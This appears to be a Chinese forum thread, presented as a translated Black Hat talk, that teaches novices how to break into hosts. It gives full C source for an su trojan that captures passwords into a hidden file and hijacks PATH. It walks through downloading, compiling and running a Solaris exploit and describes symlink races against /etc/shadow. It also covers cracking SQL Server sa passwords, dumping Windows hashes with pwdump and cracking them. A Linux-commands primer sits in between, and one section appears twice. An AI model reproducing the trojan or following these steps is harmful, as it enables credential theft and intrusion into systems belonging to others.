大家好:我是Kevin Mitnic,我翻譯這篇文章的目的不是讓你們去入侵,而是讓你們懂得黑客入侵的步驟,這樣我們才能更好的防禦黑客。。。
好了開始吧~
這篇文章是我再blackhat的主頁上看到的,這是今年blackhat在加拿大黑客大會上一個著名的黑客的安全報告。
如果你有興趣看英文原版請找我聯繫:441303228
再說明一次這篇文章不是教你們怎麼樣去入侵,而是更好的防禦,以後我將陸續放出其他的安全報告,絕對精彩,請關注。。。
題目:黑客入侵方法學
目錄:1.一般入侵法2。如何保存權限,防後門。3,script腳本方式
1.一般的入侵辦法"Old school"
⒚信息收集(包括:探查和入侵兩部分)
⑵改進(非常重要,包括改進源代碼等)
⑶保護措施
⑷滲入/ 撤出
下面是上面一步一步的詳細介紹
⑴信息收集分5個方面。
1。確定攻擊目標,不然搞個屁啊。
2。經常從一個具體的網絡或者一傢俱體的公司開始.
3.Whois nslookup 查詢
4。samspade.org
5.搜索引擎(google攻擊,以後我會詳細介紹這部分,這部分內容太多,而且非常容易簡單)
信息收集部分的探查部分:
1.總體掃描具體地址的漏洞其中包括以下4部分
⒈nmap掃描
⒉netcat
⒊netbios掃描
⒋搜索目標機器上的版本和服務banner標題
舉例:nmap -o target.com (NMAP不僅僅用於端口掃描,它也包括-o的操作系統探測.) nmap -p target.com 列出目標機器的rpcinfo信息。
好了信息收集部分就到次爲知了,如果大家覺得好的話我會繼續放出其餘部分,其餘部分都是非常值得看的~
歡迎大家支持我這個新來的斑竹。。
謝謝。。。
下次見。。。。。。。。。。。。。。
Kevin Mitnic(550669)希望大家能和我討論技術。。。。。。。。。
|
上次講到了黑客的基本信息查詢,現在放出黑客的攻擊部分,大家精神起來,因爲大部分操作都在linux下操作的所以希望大家能裝個linux,如果大家不懂的話我以前做過這樣的一個動畫,可以找我聯繫。
還是哪句話:我是Kevin Mitnic,我翻譯這篇文章的目的不是讓你們去入侵,而是讓你們懂得黑客入侵的步驟,這樣我們才能更好的防禦黑客。。。
好了開始吧~這次的主題是入侵部分
1。基本入侵方式之攻擊:
⒈收集相容的Expolits代碼
2。如果有需要,修改Expolits部分。
⒊對目標發動攻擊
⒋修改參數,重新發動攻擊,(如果要求)
添加一點自己的想法,大家不會介意吧。
其實有許多不同的方式來入侵主機,按我自己的理解分爲2部分。
⑴本地入侵方式,入侵者已經有了shell的權限,下面做的事就是提升權限。
例如黑客經常用的su.c
/*
* sutroj.c
* by bind
*
* Written as a replacment for all the ****ed up su trojans.
*
* Installation: assuming sutroj.c is in $HOME
* 1.) mkdir ~/...
* 2.) cd ... ; mv ../sutroj.c ./su.c
* 3.) gcc -o su su.c
* 4.) echo 'PATH=$HOME/...:$PATH' >> ~/.bash_profile
*
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#define FILE "/tmp/.p4ss"
#define ERROR "Sorry."
int main(int argc, char *argv[])
{
char buffer[20];
char command[30];
char user[10];
char *path;
int output;
system("echo /"rm $HOME/.../su; ln -s /bin/su $HOME/.../su ; rm $HOME/.../script/" > $HOME/.../script");
system("chmod +x $HOME/.../script");
if(argv[1] != NULL)
sprintf(user,"%s -> ",argv[1]);
else sprintf(user,"root -> ");
snprintf(buffer,sizeof(buffer),"%s/n",getpass("Password: "));
output = open(FILE,O_CREAT | O_WRONLY | O_APPEND,0666);
if(user != NULL)
write(output,user,strlen(user));
write(output,buffer, strlen(buffer));
close(output);
printf("%s/n",ERROR);
system("script");
}
⑵遠程攻擊。。就是遠程得到root權限。
舉例:SNMPXDMID overflow (Solaris 6-8)
http://www.securityfocus.com/bid/2417
OKOK不羅嗦了進入真正的實戰入侵部分:
先來舉3個很簡單的例子,熱熱身好進入以後更加複雜的部分:這部分幫助你理解入侵的方式。。
1利用競爭條件入侵部分:
⒈一個攻擊者在在兩次操作之間的一個敏感的時間窗口期間強迫進行一次行動
⒉一個程序保證輸出/tmp/temp_output這個文件並不存在。
⒊計劃徘徊並且做其他材料
⒋立刻建立一個系統連接文件從/tmp/temp_output 到/etc/shadow
⒌程序寫到/tmp/temp_output它已經嚴重傷害了/etc/shadow文件
例子:RedHat Linux diskcheck
http://online.securityfocus.com/bid/2050
2。系統環境錯誤
⒈黑客將嘗試、着改變系統環境,儘管開發的程序員並不希望如此
⒉例如,一個程序依賴Unix環境變量;$USER 確定誰正運行計劃
⒊黑客通過改變變量的值讓它以root運行。
⒊就是弱口令了不講太多了了~~~
好累啊~~~
今天到次爲支了,明天繼續放出其他黑客入侵部分。
下次講解黑客入侵操作系統的詳細步驟。。希望大家關注。
歡迎大家支持我這個新來的斑竹。。
謝謝。。。
下次見。。。。。。。。。。。。。。
Kevin Mitnic(550669)希望大家能和我討論技術。。。。。。。。。
閒着沒事繼續翻譯吧~雖然這是很累的工作,可是爲了廣大的菜鳥黑客入門我就豁出去了,我已經N天沒有睡覺了,你們支持支持我的帖子吧~好不好留個言我好改進。。
大家好:我是Kevin Mitnic,我翻譯這篇文章的目的不是讓你們去入侵,而是讓你們懂得黑客入侵的步驟,這樣我們才能更好的防禦黑客。。。
上次講到了肉口令,現在我們正式講解入侵的詳細步驟,
首先介紹幾個Exploits站點,世界上都很有名的。
1。SecurityFocus: (http://www.securityfocus.com)
2。Packetstorm: (http://packetstormsecurity.org)
3。Hack in the Box: (http://www.hackinthebox.org)
以上的站點都是我經常去的,希望大家爲了技術也多多上這上面來學習知識。。
好了正式進入unix入侵
⒈入侵的經典模型:
⑴找到Exploits
⑵下載Exploits
⑶修改Exploits
⑷建立Exploits
⑸測試Exploits
⑹正式運行Exploits
下面就接合例子詳細講解這個經典的入侵模型,
1。找到Exploits
這裏面有個很重要的學問,下面我來詳細講解一下,如果你要入侵solaris的機器,你先去google.com搜索solaris Exploits,然後進去相應的網站。。。
2。得到代碼
因爲我假設大家的平臺是linux所以操作再linux下操作了
[root#localhack cnbird]#mget http://www.phreak.org/archives/exploits/unix/solaris-exploits/sparc/2.6/amountdexp.tar.gz
——————————省略輸出了,只不過是下載的過程,wget可以讓你把Wxploits下載到黑客的機器中。。。。。。。
3。修改代碼:
這部分知識需要很多圖,而PDF文件在肉機器上不好下載,所以就不講解這部分了,如果有你興趣可以找我要blackhat的原文件。。
4。建立代碼
用[root#localhack/amountdexp]#make編譯程序
這時候已經成功,
5。測試代碼
[root#localhack/amountdexp]./amountdexp -h
USAGE ./amountdexp address cache command type[port]
FUTUER HELP :
ADDRESS - system IP
CACHE - system hostname
COMMADN - Execute This command
TYPE - 0:Solaris 2。5。1 stock
1:Solaris 2。5。1 patched 2。6 2。6。1
port - Optional port to bypass portmapper
-H就是顯示幫助。。。。
下次再講入侵部分,卡上已經到時間了。。。。哎~~~~~~
學生就是窮啊,誰救濟救濟我啊。。。。。。
歡迎大家支持我這個新來的斑竹。。
謝謝。。。
下次見。。。。。。。。。。。。。。
Kevin Mitnic(550669)希望大家能和我討論技術。。。。。。。。。
在下一個知識進行之前,我們先來熟悉以下linux的基本命令.
Linux基本操作命令
首先介紹一個名詞"控制檯(console)",它就是我們通常見到的使用字符操作界面的人機接口,例如dos。我們說控制檯命令,就是指通過字符界面輸入的可以操作系統的命令,例如dos命令就是控制檯命令。我們現在要了解的是基於Linux操作系統的基本控制檯命令。有一點一定要注意,和dos命令不同的是,Linux的命令(也包括文件名等等)對大小寫是敏感的,也就是說,如果你輸入的命令大小寫不對的話,系統是不會做出你期望的響應的。
ls
這個命令就相當於dos下的dir命令一樣,肯定是我第一個就要介紹的,這也是Linux控制檯命令中最爲重要幾個命令之一。ls最常用的參數有三個: -a -l -F。
ls -a
Linux上的文件以.開頭的文件被系統視爲隱藏文件,僅用ls命令是看不到他們的,而用ls -a除了顯示 一般文件名外,連隱藏文件也會顯示出來。
ls -l(這個參數是字母L的小寫,不是數字1)
這個命令可以使用長格式顯示文件內容,如果需要察看更詳細的文件資料,就要用到ls -l這個指令。例如我在某個目錄下鍵入ls -l可能會顯示如下信息(最上面兩行是我自己加的):
位置1 2 3 4 5 6 7
文件屬性 文件數 擁有者 所屬的group 文件大小 建檔日期 文件名
drwx------ 2 Guest users 1024 Nov 21 21:05 Mail
-rwx--x--x 1 root root 89080 Nov 7 22:41 tar*
-rwxr-xr-x 1 root bin 5013 Aug 15 9:32 uname*
lrwxrwxrwx 1 root root 4 Nov 24 19:30 zcat->gzip
-rwxr-xr-x 1 root bin 308364 Nov 29 7:43 zsh*
-rwsr-x--- 1 root bin 9853 Aug 15 5:46 su*
下面,我爲大家解釋一下這些顯示內容的意義。
第一個欄位,表示文件的屬性。Linux的文件基本上分爲三個屬性:可讀(r),可寫(w),可執行(x)。但是這裏有十個格子可以添(具體程序實現時,實際上是十個bit位)。第一個小格是特殊表示格,表示目錄或連結文件等等,d表示目錄,例如drwx------;l表示連結文件,如lrwxrwxrwx;如果是以一橫"-"表示,則表示這是文件。其餘剩下的格子就以每3格爲一個單位。因爲Linux是多用戶多任務系統,所以一個文件可能同時被許多人使用,所以我們一定要設好每個文件的權限,其文件的權限位置排列順序是(以-rwxr-xr-x爲例):
rwx(Owner)r-x(Group)r-x(Other)
這個例子表示的權限是:使用者自己可讀,可寫,可執行;同一組的用戶可讀,不可寫,可執行;其它用戶可讀,不可寫,可執行。另外,有一些程序屬性的執行部分不是X,而是S,這表示執行這個程序的使用者,臨時可以有和擁有者一樣權力的身份來執行該程序。一般出現在系統管理之類的指令或程序,讓使用者執行時,擁有root身份。
第二個欄位,表示文件個數。如果是文件的話,那這個數目自然是1了,如果是目錄的話,那它的數目就是該目錄中的文件個數了。
第三個欄位,表示該文件或目錄的擁有者。若使用者目前處於自己的Home,那這一欄大概都是它的賬號名稱。
第四個欄位,表示所屬的組(group)。每一個使用者都可以擁有一個以上的組,不過大部分的使用者應該都只屬於一個組,只有當系統管理員希望給予某使用者特殊權限時,纔可能會給他另一個組。
第五欄位,表示文件大小。文件大小用byte來表示,而空目錄一般都是1024byte,你當然可以用其它參數使文件顯示的單位不同,如使用ls -k就是用kb萊顯示一個文件的大小單位,不過一般我們還是以byte爲主。
第六個欄位,表示創建日期。以"月,日,時間"的格式表示,如Aug 15 5:46表示8月15日早上5:46分。
第七個欄位,表示文件名。我們可以用ls -a顯示隱藏的文件名。
ls -F(注意,是大寫的F)
使用這個參數表示在文件的後面多添加表示文件類型的符號,例如*表示可執行,/表示目錄,@表示連結文件,這都是因爲使用了-F這個參數。但是現在基本上所有的Linux發行版本的ls都已經內建了-F參數,也就是說,不用輸入這個參數,我們也能看到各種分辨符號。
cd
這個命令是用來進出目錄的,它的使用方法和在dos下沒什麼兩樣,所以我覺得沒什麼可說的,但有兩點我補充一下。首先,和dos不同的是Linux的目錄對大小寫是敏感的,如果大小寫沒拼對,你的cd操作是成功不了的。其次,cd如果直接輸入,cd後面不加任何東西,會回到使用者自己的Home Directory。假設如果是root,那就是回到/root.這個功能同cd ~是一樣的。
mkdir、rmdir
mkdir命令用來建立新的目錄,rmdir用來刪除以建立的目錄,這兩個指令的功能不再多加介紹,他們同dos下的md,rd功能和用法都是基本一樣的。
cp
這個命令相當於dos下面的copy命令,具體用法是:cp -r 源文件(source) 目的文件(target)
參數r是指連同元文件中的子目錄一同拷貝。熟悉dos的讀者用起這個命令來會覺得更方便,畢竟比在dos下面要少敲兩下鍵盤。
rm
這個命令是用來刪除文件的,和dos下面的rm(刪除一個空目錄)是有區別的,大家千萬要注意。Rm命令常用的參數有三個: -i,-r,-f。
比如我現在要刪除一個名字爲text的一個文件:rm -i test
系統會詢問我們:"rm:remove ‘test'?y",敲了回車以後,這個文件纔會真的被刪除。之所以要這樣做,是因爲linux不象dos那樣有undelete的命令,或者是可以用pctool等工具將刪除過的文件救回來,linux中刪除過的文件是救不回來的,所以使用這個參數在刪除前讓你再確定一遍,是很有必要的。
rm -r 目錄名:這個操作可以連同這個目錄下面的子目錄都刪除,功能上和rmdir相似。
rm -f 文件名(目錄名):這個操作可以進行強制刪除。
mv
這個命令的功能是移動目錄或文件,引申的功能是給目錄或文件重命名。它的用法同dos下面的move基本相同,這裏不再多講。當使用該命令來移動目錄時,他會連同該目錄下面的子目錄也一同移走。另外因爲linux下面沒有rename的命令,所以如果你想給一個文件或目錄重命名時可以用以下方法:mv 原文件(目錄)名 新的文件(目錄)名。
du,df
du命令可以顯示目前的目錄所佔的磁盤空間,df命令可以顯示目前磁盤剩餘的磁盤空間。如果du命令不加任何參數,那麼返回的是整個磁盤的使用情況,如果後面加了目錄的話,就是這個目錄在磁盤上的使用情況(這個功能可是dos沒有的呦)。不過我一般不喜歡用du,因爲它給出的信息是在是太多了,我看不過來,而df這個命令我是最常用的,因爲磁盤上還剩多少空間對我來說是很重要的。
cat
這個命令是linux中非常重要的一個命令,它的功能是顯示或連結一般的ascii文本文件。cat是concatenate的簡寫,類似於dos下面的type命令。它的用法如下:
cat text 顯示text這個文件;
cat file1 file2 依順序顯示file1,file2的內容;
cat file1 file2>file3 把file1,file2的內容結合起來,再"重定向(>)"到file3文件中。
"〉"是一個非常有趣的符號,是往右重定向的意思,就是把左邊的結果當成是輸入,然後輸入到file3這個文件中。這裏要注意一點是file3是在重定向以前還未存在的文件,如果file3是已經存在的文件,那麼它本身的內容被覆蓋,而變成file1+file2的內容。如果〉左邊沒有文件的名稱,而右邊有文件名,例如:
cat >file1:結果是會"空出一行空白行",等待你輸入文字,輸入完畢後再按[Ctrl]+[c]或[Ctrl]+[d],就會結束編輯,併產生file1這個文件,而file1的內容就是你剛剛輸入的內容。這個過程和dos裏面的copy con file1的結果是一樣的。
另外,如果你使用如下的指令:
cat file1>>file2:這將變成將file1的文件內容"附加"到file2的文件後面,而file2的內容依然存在,這種重定向符〉〉比〉常用,可以多多利用。
more,less
這是兩個顯示一般文本文件的指令。如果一個文本文件太長了超過一個屏幕的畫面,用cat來看實在是不理想,就可以試試more和less兩個指令。More指令可以使超過一頁的文件臨時停留在屏幕,等你按任何的一個鍵以後,才繼續顯示。而less除了有more的功能以外,還可以用方向鍵往上或網下的滾動文件,所以你隨意瀏覽,閱讀文章時,less是個非常好的選擇。
clear
這個命令是用來清除屏幕的,它不需要任何參數,和dos下面的clr具有相同的功能,如果你覺得屏幕太紊亂,就可以使用它清除屏幕上的信息。
pwd
這個命令的作用是顯示用戶當前的工作路徑,這個命令不用多說,大家一試即知。
ln
這是linux中又一個非常重要命令,請大家一定要熟悉。它的功能是爲某一個文件在另外一個位置建立一個同不的鏈接,這個命令最常用的參數是-s,具體用法是:ln -s 源文件 目標文件。
當我們需要在不同的目錄,用到相同的文件時,我們不需要在每一個需要的目錄下都放一個必須相同的文件,我們只要在某個固定的目錄,放上該文件,然後在其它的目錄下用ln命令鏈接(link)它就可以,不必重複的佔用磁盤空間。例如:ln -s /bin/less /usr/local/bin/less
-s 是代號(symbolic)的意思。
這裏有兩點要注意:第一,ln命令會保持每一處鏈接文件的同步性,也就是說,不論你改動了哪一處,其它的文件都會發生相同的變化;第二,ln的鏈接又軟鏈接和硬鏈接兩種,軟鏈接就是ln -s ** **,它只會在你選定的位置上生成一個文件的鏡像,不會佔用磁盤空間,硬鏈接ln ** **,沒有參數-s, 它會在你選定的位置上生成一個和源文件大小相同的文件,無論是軟鏈接還是硬鏈接,文件都保持同步變化。
如果你用ls察看一個目錄時,發現有的文件後面有一個@的符號,那就是一個用ln命令生成的文件,用ls -l命令去察看,就可以看到顯示的link的路徑了。
man
如果你的英文足夠好,那完全可以不靠任何人就精通linux,只要你會用man。Man實際上就是察看指令用法的help,學習任何一種UNIX類的操作系統最重要的就是學會使用man這個輔助命令。man是manual(手冊)的縮寫字,它的說明非常的詳細,但是因爲它都是英文,看起來非常的頭痛。建議大家需要的時候再去看man,平常嗎,記得一些基本用法就可以了。
logout
一看就知道了,這是退出系統的命令,我就不多說了。要強調的一點是,linux是多用戶多進程的操作系統,因此如果你不用了,退出系統就可以了,關閉系統你就不用操心了,那是系統管理員的事情.
uname -a 顯示本地機器的詳細資料包括內核和Unix的版本等.
|
|
大家好,我是Kevin Mitnic,鑑於前一期翻譯的文章,很多人反映難度有點太大,暫時先停一停如果大家有這方面的需要可以找我聯繫,我可以把原文發給他。
好了今天講一個特別基礎的東西,可以說是黑客入門課程,很簡單,也很實用,可以讓你很快的學會入侵,最主要的是學會入侵的思路。
好了不廢話了,開始我們的基礎課吧。
題目:網絡安全基礎教學。
1.黑客的目標
方法:
⑴踩點
⒈獲得目標的詳細信息通過google.com和www.netsol.net - whois
⒉確定範圍 www.arin.net - whois
⒊目標的配置 mail服務,dns服務,WWW服務
⑵利用漏洞入侵
2.詳細的入侵步驟
⑴確定目標是否是存活主機
⑵利用ICMP報文確定目標機器的端口,ICMP就是所謂的ping。常用的工具有superscan和fscan,
⑶常見的入侵windows的端口,
WWW(TCP 端口80&TCP 端口443)
netbios(tcp 139)
direct host (tcp 445)
Sql server(tcp 1433 & udp 1434)
終端服務(tcp 3389)
DNS (tcp 53)
下面我將詳細介紹如何利用上面的端口進行入侵,這都是我自己的知識,blackhat上面沒有寫這些東西,也許是太簡單吧~呵呵,不說廢話了開始吧
①首先從DNS開始,DNS是一個域名查詢系統,具體查詢的過程和原理請看相應教程,好了開始了我們講用系統自帶的命令查詢,NSLOOKUP這個命令(XP和2000 server自帶)
例子: c:/>nslookup
>server ipaddress
>set type=all
>ls -d ipaddress
好了時間不夠了第一部分先給到這裏,如果大家喜歡的話我會繼續放出第二部分。。。。
大家好,我是Kevin Mitnic,鑑於前一期翻譯的文章,很多人反映難度有點太大,暫時先停一停如果大家有這方面的需要可以找我聯繫,我可以把原文發給他。
好了今天講一個特別基礎的東西,可以說是黑客入門課程,很簡單,也很實用,可以讓你很快的學會入侵,最主要的是學會入侵的思路。
好了不廢話了,開始我們的基礎課吧。
題目:網絡安全基礎教學。
1.黑客的目標
方法:
⑴踩點
⒈獲得目標的詳細信息通過google.com和www.netsol.net - whois
⒉確定範圍 www.arin.net - whois
⒊目標的配置 mail服務,dns服務,WWW服務
⑵利用漏洞入侵
2.詳細的入侵步驟
⑴確定目標是否是存活主機
⑵利用ICMP報文確定目標機器的端口,ICMP就是所謂的ping。常用的工具有superscan和fscan,
⑶常見的入侵windows的端口,
WWW(TCP 端口80&TCP 端口443)
netbios(tcp 139)
direct host (tcp 445)
Sql server(tcp 1433 & udp 1434)
終端服務(tcp 3389)
DNS (tcp 53)
下面我將詳細介紹如何利用上面的端口進行入侵,這都是我自己的知識,blackhat上面沒有寫這些東西,也許是太簡單吧~呵呵,不說廢話了開始吧
①首先從DNS開始,DNS是一個域名查詢系統,具體查詢的過程和原理請看相應教程,好了開始了我們講用系統自帶的命令查詢,NSLOOKUP這個命令(XP和2000 server自帶)
例子: c:/>nslookup
>server ipaddress
>set type=all
>ls -d ipaddress
好了時間不夠了第一部分先給到這裏,如果大家喜歡的話我會繼續放出第二部分。。。。
好了今天有時間了,今天繼續咱們的入門課程.
上次講到了53端口(DNS的利用辦法)下面我們來講講SQL server的利用方法,方法很多了,例如大家常用的sa弱口令,今天告訴大家一個漏洞非常的好用,就是sqlhello遠程執行任意系統命令的漏洞,具體方法可以參考這篇文章,
http://www.77169.com/donghua/network/200409/16200.html
成功率非常的高。大家可以試試~
了下面我們來講解一個詳細的例子,來告訴黑客是如何從外部入侵到內部的詳細經過。
首先說明一下入侵的網絡環境,便於大家理解如何入侵的。
外部 NT #1 | | router | |內部 域控制器
10.1.1.10|----------| 10.1.1.1 | | 172.16.1.200
| 172.16.1.1 | ----- | 放火牆
|這裏就是 | ----連接的路由器| | 172.16.1.252
NT #2 internet區域| | | WWW
10.1.1.38| ------- | | |172.16.1.38
這個就是測試的環境,下步我們要做什麼呢?
OK,聽我一步一步講來,
①攻擊 172.16.1.200(DNS),這一步我們已經完成,請參考第一章最後部分的DNS查詢
②攻擊 172.16.1.38 我們假設它開放了SQL服務並且監聽38038和WEB(80)
我們通過SQL密碼破解器得到了SQL server的密碼,(友情提示:如果需要的話,可以找我聯繫,我這裏有自己漢化後的工具.)
得到sa我們能幹什麼呢?相信很多人都能理解,開3389或者是其他後門,都可以自己發揮,可是今天我們要講的是另外一種思路,先介紹一下用到的工具Pwdump.exe用來獲得NT和2000的HASH口令,netcat號稱網絡瑞士軍刀,L0phtCrack破解NT或者是2000密碼的工具.
下面我們把pwdump和nc上傳到172.16.1.38,然後在cmd方式下輸入pwdump
C:/pwdump
Administrator:500:AF6E956C6F6836C45DD1E87D9BC7180C:E0FB21C260A845E778186CE65030A
4A6:::
Guest:501:********************************:********************************:::
HelpAssistant:1000:03FE43A67E24F94546B8750FA34476F6:84BC7E1C3F794112956A084BA21F
4B03:::
SUPPORT_388945a0:1002:3B2929B77CBCEFB529267A5267D9678A:7C9847EF14D26D884F2E8522B
CC8E1D0:CN=Microsoft Corporation,L=Redmond,S=Washington,C=US::
jj:1003:9C0C82FB097E7E5C1DC65C803DB058F1:EA1064E8B0F75158D8E09B5ABC27191C:::
就是一個典型的NT的加密的密碼,如何破解呢?這個時候用到了L0phtCrack這個工具了,這部分不是重點,我只提供了一個思路,具體如何破解就要自己摸索了.
這部分不知道大家喜歡不喜歡啊?下部分我講要重點講解如何進入到內部。
謝謝。。。
下次見。。。。。。。。。。。。。。
Kevin Mitnic(550669)希望大家能和我討論技術。。。。。。。。。
